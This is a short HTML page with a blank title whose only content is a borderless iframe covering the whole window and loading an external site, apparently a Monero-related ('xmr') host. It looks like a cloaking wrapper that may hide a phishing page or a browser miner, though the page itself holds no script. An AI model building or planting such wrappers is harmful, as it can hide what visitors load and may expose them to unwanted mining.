<!doctype html>
<html lang="en">
<head>
  <meta charset="utf-8" />
  <meta name="viewport" content="width=device-width,initial-scale=1" />
  <title></title>
  <style>
    /* absolutely minimal: full-bleed iframe, no margins, no extras */
    html,body{height:100%;width:100%;margin:0;padding:0;overflow:hidden}
    iframe{position:fixed;inset:0;width:100%;height:100%;border:0;margin:0;padding:0;display:block}
  </style>
</head>
<body>
  <iframe src="https://xmr.fixcraft.jp" frameborder="0" allowfullscreen></iframe>
</body>
</html>
